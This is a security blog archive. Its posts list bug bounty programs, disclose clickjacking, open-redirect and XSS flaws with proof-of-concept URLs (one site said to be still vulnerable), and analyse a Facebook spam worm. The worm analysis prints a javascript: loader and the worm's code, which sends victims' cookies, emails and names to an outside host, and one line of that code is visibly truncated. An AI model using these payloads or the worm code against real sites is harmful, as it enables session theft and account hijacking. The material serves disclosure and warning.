Thursday, September 20, 2012

List of Bug Bounty Programs

Bug Bounty Program a well known topic is on the heat these days, known companies like: Google, Facebook, Mozilla are paying for finding a vulnerabilities on their web servers, products, services or some associated applications. Here is a list for all the Security Researchers and Bug Hunters to target all the best :)

Bug Bounty Websites for Web Application Vulnerability

Mozilla
security@mozilla.org
http://www.mozilla.org/security
http://www.mozilla.org/projects/security/security-bugs-policy.html
http://www.mozilla.org/security/announce

Google
security@google.com
https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2

Facebook
http://www.facebook.com/whitehat/bounty

Paypal
sitesecurity@paypal.com
https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues

Etsy
security-reports@etsy.com
http://www.etsy.com/help/article/2463

Wordpress
http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html

Commonsware
http://commonsware.com/bounty.html

CCBill
http://www.ccbill.com/developers/security/vulnerability-reward-program.php
http://www.ccbill.com/developers/security/rewards.php

Vark
http://www.vark.com

Windthorstisd
http://www.windthorstisd.net/BugReport.cfm

Bug Bounty Websites for Products Vulnerability

Mozilla
http://www.mozilla.org/security
http://www.mozilla.org/security/known-vulnerabilities/firefox.html

Google Chrome
http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program

Zero Day Initiative
http://www.zerodayinitiative.com

Barracuda
bugbounty@barracuda.com
http://www.barracudalabs.com/bugbounty
http://www.barracudalabs.com/bugbounty/halloffame.html

Artifex Software
http://www.ghostscript.com/Bug_bounty_program.html

Hex Rays
http://www.hex-rays.com/bugbounty.shtml

Ardour
http://ardour.org/bugbounty

Piwik
http://piwik.org/security

Hall of Fame & Responsible Disclosure Websites(No Bounties)

Microsoft

http://technet.microsoft.com/en-us/security/cc308589
http://technet.microsoft.com/en-us/security/cc308575
http://technet.microsoft.com/en-us/security/cc261624
http://www.microsoft.com/security/msrc/default.aspx
http://technet.microsoft.com/en-us/security/ff852094.aspx

Apple
product-security@apple.com
http://support.apple.com/kb/HT1318
https://ssl.apple.com/support/security/

Adobe
http://www.adobe.com/support/security/bulletins/securityacknowledgments.html
http://www.adobe.com/support/security/alertus.html

IBM
http://www-03.ibm.com/security/secure-engineering/report.html

Twitter
https://twitter.com/about/security
http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#
https://support.twitter.com/forms

Dropbox
security@dropbox.com
https://www.dropbox.com/security
https://www.dropbox.com/special_thanks

Yahoo
security@yahoo-inc.com

http://security.yahoo.com/article.html;_ylc=X3oDMTFwMGI4cDJnBF9TAzU2NTAwMDAwMgRhaWQDMjAwNjEyMDUwMQRjbmFtZQNZb3VyIFNlY3VyaXR5IG9uIFlhaG9vIQ--?aid=2006120501

Cisco
http://tools.cisco.com/security/center/home.x#~alerts

Moodle
http://moodle.org/security

Drupal
http://drupal.org/security-team

Oracle
http://www.oracle.com/us/support/assurance/reporting/index.html

Symantec
http://www.symantec.com/security

Ebay
http://pages.ebay.com/securitycenter/Researchers.html

Twilio
http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html

37 Signals
http://37signals.com/security-response

Salesforce
http://www.salesforce.com/company/privacy/disclosure.jsp

Reddit
http://code.reddit.com/wiki/help/whitehat

Github
http://help.github.com/responsible-disclosure/

Ifixit
http://www.ifixit.com/Info/responsible_disclosure

Constant Contact
http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp

Zeggio
http://www.zeggio.com

Simplify
http://simplify-llc.com/simplify-security.html

Team Unify
http://www.teamunify.com/__corp__/security.php

Skoodat
http://www.skoodat.com/Security

Relaso
http://relaso.com/disclosure

Moduscsr
http://www.moduscsr.com/security_statement.php

Cloudnetz
http://cloudnetz.com/Legal/vulnerability-testing-policy.html

Emptrust
http://www.emptrust.com/Security.aspx

Apriva
http://www.apriva.com/security

Amazon
http://aws.amazon.com/security/vulnerability-reporting

SqaureUp
https://squareup.com/security/levels

G-Sec
http://www.g-sec.lu/responsible.disclosure.policy.html

Xen
http://www.xen.org/projects/security_vulnerability_process.html

Engine Yard
http://www.engineyard.com/legal/responsible-disclosure-policy

Lastpass
https://lastpass.com/support_security.php

RedHat
https://access.redhat.com/knowledge/articles/66234

Acquia
https://www.acquia.com/how-report-security-issue

Mahara
security@mahara.org
https://wiki.mahara.org/index.php/Security

Zynga
security@zynga.com
http://company.zynga.com/security/whitehats

Risk.io
https://www.risk.io/security

Opera
http://www.opera.com/security/policy
https://bugs.opera.com/wizarddesktop
http://my.opera.com/securitygroup/blog/2013/04/05/thanks-to-the-researchers

Owncloud
http://owncloud.org/security/policy
http://owncloud.org/security/hall-of-fame

Scorpion Soft
security@scorpionsoft.com
http://www.scorpionsoft.com/company/disclosurepolicy

Norada
http://norada.com/norada/crm/security_response

Cpaperless
http://www.cpaperless.com/securitystatement.aspx

Wizehive
http://www.wizehive.com/security
http://www.wizehive.com/special_thanks.html

Tuenti
http://corporate.tuenti.com/en/dev/hall-of-fame

Nokia Siemens
http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure

Sound Cloud
http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure

HTC
security@htc.com

http://www.htc.com/www/terms/product-security

Neohapsis
http://www.neohapsis.com/disclosure.php

Nokia
security-alert@nokia.com
http://www.nokia.com/global/security/security
http://www.nokia.com/global/security/acknowledgements

BlackBerry
secure@blackberry.com
https://www.blackberry.com/profile/?eventId=8322
http://us.blackberry.com/business/topics/security/incident-response-team/collaborations.html

Heroku
security@heroku.com
https://policy.heroku.com/security

Chargify
security@chargify.com
https://chargify.com/security

Zendesk
security@zendesk.com
http://www.zendesk.com/company/responsible-disclosure-policy

Lookout
security@lookout.com
https://www.lookout.com/responsible-disclosure

Puppetlabs
http://puppetlabs.com/security

Saturday, September 15, 2012

Linkedin's Clickjacking & Open Url Redirection Vulnerabilities

# Vulnerability Title: Secondary Email Addition & Deletion Via Click Jacking in Linkedin
# Website Link: [Tried on Indian version]
# Found on: 06/08/2012
# Author: Ajay Singh Negi
# Version: [All language versions would be vulnerable]
# Tested on: [Indian version]
# Reported On: 07/08/2012
# Status: Fixed
# Patched On: 10/09/2012
# Public Release: 15/09/2012

I have found Click Jacking & Open Url Redirection vulnerabilities on Linkedin Website on 6th and 7th August 2012.

Summary

A Clickjacking vulnerability existed on Linkedin that allowed an attacker to add or delete a secondary email and can also make existing secondary email as primary email by redressing the manage email page.

Details

Linkedin manage email page (a total of 1 page) was lacking X-FRAME-OPTIONS in Headers and Frame-busting javascript measures to prevent framing of the pages. So the manage email page could be redressed to 'click-jack' Linkedin users. Below I have mentioned the vulnerable Url and also attached the Proof of concept screenshots.

1. Click Jacking Vulnerable Url:
https://www.linkedin.com/settings/manage-email?goback=.nas_*1_*1_*1

Click Jacking Vulnerability POC Screenshots:

The redressed editor page with frame opacity set to 0 so it is invisible to the user. As the user drags the computer into the trash-bin and clicks the Go button, a new secondary email will be added into the Linkedin user's account.

With the frames opacity set to 0.5 you can clearly see the redressed page and all the background. The computer is actually a text area that contains the attacker's email address which is selected by default with the computer image(Using JavaScript), once the Linkedin user drags the computer he will actually drag the attackers email address into the add secondary email address area and when he will click the go button, the Linkedin user will actually click the redressed add email address button and the attackers email will be successfully added in the Linkedin users account.

Secondary email added successfully into the Linkedin users account.

No X-Frame-Options in servers response header.

Linkedin addressed the vulnerability by adding X-FRAME-OPTIONS in header field which is set to SAMEORIGIN on this page.

# Vulnerability Title: Open Url Redirection in Linkedin
# Website Link: [Tried on Indian version]
# Found on: 05/08/2012
# Author: Ajay Singh Negi
# Version: [All language versions would be vulnerable]
# Tested on: [Indian version]
# Reported On: 06/08/2012
# Status: Fixed
# Patched On: 07/09/2012
# Public Release: 15/09/2012

Summary

Open Url Redirection using which an attacker can redirect any Linkedin user to any malicious website. Below I have mentioned the vulnerable Url and also attached the Proof of concept video.

Original Open Url Redirection Vulnerable Url:

https://help.linkedin.com/app/utils/log_error/et/0/ec/7/callback/https%3A%2F%2Fhelp.linkedin.com%2Fapp%2Fhome%2Fh%2Fc%2Ffrom_auth%2Ftrue

Crafted Open Url Redirection Vulnerable Url:
https://help.linkedin.com/app/utils/log_error/et/0/ec/7/callback/http%3A%2F%2Fattacker.in

Open Url Redirection Vulnerability POC Video:

Impact of Vulnerability:

The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data.

The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site.

Special Thanks to AMol NAik, Sandeep Kamble and all G4H members :)

Tuesday, September 11, 2012

Stored XSS Via Viewstate

While researching I have found that Stored XSS can be found Via Viewstate Parameter even when Viewstates Mac is Encrypted. The actual cause of this vulnerability existence is that the viewstate parameters value is not properly getting decoded on the server-side therefore any XSS payload in this paramter will get excuted and if there is any filter then it can be bypassed by converting the XSS payload in base 64 payload.

Steps to execute this attack are as following:

1. First input any random data in login page and submit it on any aspx application.

2. intercept the using burp proxy if there is any client side validation submitted request then modify the actual viewstate parameter as shown below.

__VIEWSTATE=oJ8hAgVek8ugvqZtQ8vy9baHA1JCMeiHO0LxTIPJT0HfnQeGqLUkBqqp%2Fn%2FNhlfxnOzTZMuhKC2wyoCSHbo9pLsXD3kA8Y9fRx%2F1c8HvBHZnz3B4VkL6%2FkzBmGhZr8vEI7eTwScjrz1skp0cOJK%2Fr1dNP3Umh0jaS%2FyBkAH2Ikan9iMQBtmaLmy6m0%2BFFwA1fGgBgk60iYonO5182BdA%2FsZ8pdZnaDRPpY1q3RORFbbZ2WfZKsYhviogwsPldBOSLyOVrS9kRwU4DCDK5uE5RkgEU7ggZmxaOtSfbicezf%2BttQxsRysfMRmK%2F94r63f%2BsQxKrM2udYbpT0s%2FWiUDPmnB50oIltm1FHGm%2BYLu0PgL9RTP

to __VIEWSTATE=<scripts>alert(document.cookie)</script> the intercepted request

Also the XSS Payload <scripts>alert(document.cookie)</script> can be converted to base 64 Jmx0O3NjcmlwdHMmZ3Q7YWxlcnQoZG9jdW1lbnQuY29va2llKSZsdDsvc2NyaXB0Jmd0Ow==

3. now forward the request using burp web proxy

4. the javascript payload will execute on the client side as there the decoding of the base 64 value in viewstate parameter is not properly decoded on the server side therefore the malicious XSS payload will not be sanitized on the server side and if there is no HTTP only cookie attribute is implemented so the attacker can get all the authentication session cookies of the victim.

5. using the web proxy burp we were able to inject the XSS payload and it also executed successfully after modifying and forwarding the intercept request but the interesting thing is that this payload was successfully executed using the vulnerable Viewstate parameter then this payload actually got stored in the server side and the XSS vulnerable page redirected to an error webpage with a different Url, then we copied and opened this Error page Url in another browser. As the XSS payload is stored on the server side so this XSS payload got executed again and again. So, the same attack can now be done without any web proxy like burp as the malicious XSS payload is stored on the server side and that can be reused using the error page Url which was generated after the execution of malicious XSS payload using the web proxy burp.

Malicious Url with Stored XSS Payload:

https://vulnerablesite.com/Error.aspx?parameter=vKJp31W6plKC1+MfxM3z/K6F3rbyiQeRCXHy/YbkgoBg94PMC17/UXcJIpNI9B4syvRRcsKLAdRrV3GAD9FdNYPMbeGuWK4d+PxU2rrWZJ3B8Szg283u9f71W7gw6CmRUfNG0ixyGFVsvsDAx8UEHVZ6LEfXo49SclUuUOruiHmdF99v7PtOAwd4aGDBSTB3dQX3DfgxZSr3Oiwkuf627ni0IWPU74Fqo0XTyJSXLT18H56LNeoG2F8G3CqsofnbJaMZnYD4Evu445EMpAJQZ+R9n0JV0uXHLVfh+ERAl+snQMi+CgAvv6YPWl5ygPJ45s+NLdKZXH8lkhlx2CM33dCi2AbBwci3yOAHpOFakr+Qa0V5WV8hA/b5gFcWK5WN3h0qD4zq+YqCPfMb+3V1jd86+yD5MGYLfsgUv7X8KZ8obDVRIFslWrXApYF7Nz1lDOC8PkLmulHs193yLchYDKM/Ie2uckvLGxcKflcY3RfTiQMLIDb99Z2Yp3F84VT3t0PqVa6hu37pvSj1ROuRRHsQLDCAnIizlVvfffaDfnhkLwMG5HSqac9bwp5yZX2MeZ07AIe64a/TZwcvicZsMZlI/jJ8Ul8CMIjGbihGO93E/53tnqAjHkk0Lv2jAjrsK83Q+m0yeJnvT5S3dQkVvqccfsO9DZk/i3I4vAB9y9qYCo4j3JzzAeMoydbQ20JOugn0BXPGyYtxPkih4qkYLwMjB2Yltoxj24hOCez9cGelxFI1S8iO0lnNEdasKWpFE1cE3dUcJf5SeJR/tgkAR0kU+M0Vby7SWG+Umu/8/PVXyd4BqXtJJqfi5nz2Eh94o5/kZoPjGHWDvGNuzLVCqloL3qgIxva+EqjHUzk7U17DFa34HxhcvGLUzNNzYnJhll/n4Ao1BhrTv2dIhuyeZXjEuwbA0S6YN13s3/9p6GyEvraIVSBSIPZtxXcfU/PLP4YUehqr/6R3/PWh5So4y4DlvyMepPeVd0OLnvDq+OJ3BbqhUxSDZRlJhQA3sedE+YsJ9lQFUKLUb2fBqLqyKzMDwikf0tmB5q/BOEOi5GEW+IaYVhSXJXJxtoTcpHY21ovviuZp85cXYCUqqbp044uCLMQqtqZtyxyGkL/BVY7+9pjiQrr+g8OBhpNjLfthkWVoptz/WcoRVHY7X5wZBp==

Impact:

Client-side code (like JavaScript) can be injected into the web application which is then returned to the user's browser. This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.)

Recommendation:

User inputs must be validated and filtered before being returned as part of the HTML code of a page. Don't rely on this security mechanism to protect against Cross-Site Scripting and SQL injection attacks. Make sure that proper input validation is built into web applications.

Monday, December 27, 2010

XSS & CSRF Vulnerabilities on Area Startup Website

Hi Guys, I have found Major XSS and CSRF Vulnerabilities on Area Startup Website while I was just searching for some IT firms details :P and the site is still vulnerable so I have submitted it to xssed.com vulnerability database I hope they will soon fix it :D

Issue Details

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

Crosssite request forgeries (CSRF or sometimes called XSRF) are a simple attack that has huge impacts on Web application security.

CSRF GET-based CSRF (or blind redirects) is simple with XSS-Proxy.The attacker enters the destination into the “fetch document” admin form and the victim will go to the URL, determine that it can’t read the contents, and recover back to where the attacker can perform other actions.

POST-based CSRF is also possible, but requires some JavaScript (via the eval admin form) to perform the attack.The JavaScript could perform a POST-based CSRF if entered in the XSS-Proxy eval admin form (this can be entered as one large command or as multiple eval submissions).

Proof of Concept

Vulnerable Link 1:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&sa=Search#842

Screenshot 1:

Vulnerable Link 2:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28%27This%20Site%20is%20XSS%20Vulnerable%27%29%3C/script%3E&sa=Search#242

Screenshot 2:

Vulnerable Link 3:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ciframe%20src=http://xssed.com%3E&sa=Search#242

Screenshot 3:

Vulnerable Link 4:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%28This%20Site%20is%20XSS%20Vulnerable%3C/h1%3E%3C/marquee%3E&sa=Search#243

Screenshot 4:

Vulnerable Link 5:
http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ca%20href=%27search?searchterm=%3Cb%3EJust%20Fond%20Out%3C/b%3E%27%3EThis%20Site%20is%20XSS%20Vulnerable%3C/a%3E&sa=Search#243

Screenshot 5:

Video:

Friday, December 24, 2010

Symantec Norton Website XSS Vulnerable

Hi Guys, two weeks back I have found that Information Security Gaint Symantec Norton's Website has few XSS vulnerabilities. As off now they have fixed there site it so I am disclosing the Issue :)

Issue Details

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

Proof of Concept

Vulnerable Link 1:
https://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Jq23M7YG4pjMHzwGYtlDfhdq1ZYF22vswwCBfgSGGz0k5FrgMHF9!1505726402!1291573284101

or the following code can be used in the search box or input box :

<script>alert('xss')</script>

Screenshot 1:

Vulnerable Link 2:
http://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Q72nM7hHJ18nVR9GQVNT3Bz01whgMYMNGSLT1H2nyYDtwwChvs22!1505726402!1291573991721

or the following code can be used in the search box or input box :

<script>alert('xss')</script>

Screenshot 2:

Thursday, December 16, 2010

DOJOCON 2010 Videos

Monday, December 13, 2010

Reverse Engineering Videos

Security Videos Collection

Hello Everybody I want to share to some of my favorite security related videos collection,I am & also giving all those resumable videos direct downlading links so thats everybody can download them easily

, I hope it will be helpful for everybody to learn from them

, full credit goes to the real owners of the videos & to the sites from where I have find these videos.

Security Videos Collection

Malware Analysis & Related Videos

Friday, December 3, 2010

Be Alert From Malicious Scripts & Spam on Facebook

While Analyzing Malicious scripts & codes used by crackers & spammers I found out that crackers and spammers are using different attack vectors & techniques to compromise innocent users pofiles and to spam using automated techniques in which they post a comment in users profile or send them a new application(many times fake) to use for example on facebook or any other social networking profile.

If the user click on that posted Link or uses that New Application(many times fake) mostly the users account got compromised if the site is vulnerable to the malicious code or if its a kinda a Zeroday exploit & sometimes the innocent users profile is bombard with spam messages, comments, posts, ads & fake Application use requests all these spams also automatically got posted or sended to all your friends f the users profile.

So guy if you get a wall post by some of your friend saying some revolving image, new theme thing is out view the link to enjoy it & the message would be like this......

Example 1:
Wowww !! cool Facebook revolving images. MUST SEE http://pageragei.tk/

Example 1:
Super cool Facebook revolving images. MUST SEE http://showmyprofile.tk/

When you open any of these malicous sites, these sites will asks you to copy & paste some JavaScript code like.......

Code :

javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)

And when you enter press after copying & pasting that code in your browser that will will redirects you to a malicous java script the link and when you post it in your Facebook account Address bar...

Thats it you start spamming automatically to all your facebook friends wall and the Fire keeps increasing as more and more your friends will click on that malicious code.

the malicious java script code link is: http://imaginemonkeys.com/majic.js

This link has a again a same kind of code but this time the url link in the code is differ......

Code:

javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

This time the link is: http://graphicgiants.com/majic.js

And when I tried to open it directly in the browser it block me to further analyze it showed me an error message as below mentioned:

Not Found

The requested URL /majic.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.graphicgiants.com Port 80

So now I new something is fishy going on there as the site has some kinda authencation mechanisms & also it has mode security install on it to block unauthorised users, so to further analyze it more I opened & used that malicous code in a testing and secure virtual environment with a profile for testing and while doing the whole process i used the sniffer to see the background re-directions to other urls, malicious codes I also crawled the other url of that site.

So I found out that the redirections was to the facebook site whenever a user opens that http://imaginemonkeys.com site directly in the browser and it will first redirect user to the

http://1.88.channel.facebook.com & then to the http://facebook.com official site.

While testing the url inside the imaginemonkeys.com i found out that it has few more links like http://www.imaginemonkeys.com/606/ http://www.imaginemonkeys.com/majic.js etc.

The Script which runs inside the JS means Java Script which is mostly majic.js or the index.php file is

it will show a url like :http://www.imaginemonkeys.com/majic.js OR http://imaginemonkeys.com/index.php

The hidden inside the malicious script is mentioned below.

Code:

//
//
txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";
txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

with(x = new XMLHttpRequest())
open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";

with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);

Some of the Websites you should not visit if you see below :

http://pageragei.tk/

http://showmyprofile.tk/
http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/

New domains keep coming by crackers & spammers so be aware never click on unknown links....

HOW TO STOP IT ?

1. To stop it spamming to your wall simply re-generate your mobile email unique address at
http://www.facebook.com/mobile/

2. Change your password also delete all your browers cookies, browsing history & saved passwords.

3. Don't copy/pasting javascript or any ther unknown scripts into your browser again.

4. And mostly importantly never click on unknown links always check your browsers url bar that
it has https or http://www.facebook.com not phising or fake sites like http://www.faacebook or
http://www.faceb00k.com.

5. Use Good Security Suite Softwares like AVG 2011 or Norton 2011 or any other and always update
its virus definitions and program components these security suite has all type of security softwares
in-built like Antivirus, Anti-Spyware, Anti-Spam, Anti-Phising, Firewall & IDS etc.

6. Keep your Operating System always updated and also update all of your application softwares like
the browser itself.

So Be Cautious Guys whenever you see comments like:Great now we have such Applications in Facebook & never use these applications nor accept these applications use requests.

Two Applications which I found out is just popping up is See Who Has Visited Your Profile Profile Privacy v1.2. So please remember that these are FAKE APPLICATION and use such comments on other users wall to click or use them.

I hope my post is helpful for all of you guys :) comments are welcome.

Welcome to Computer Security with Ethical Hacking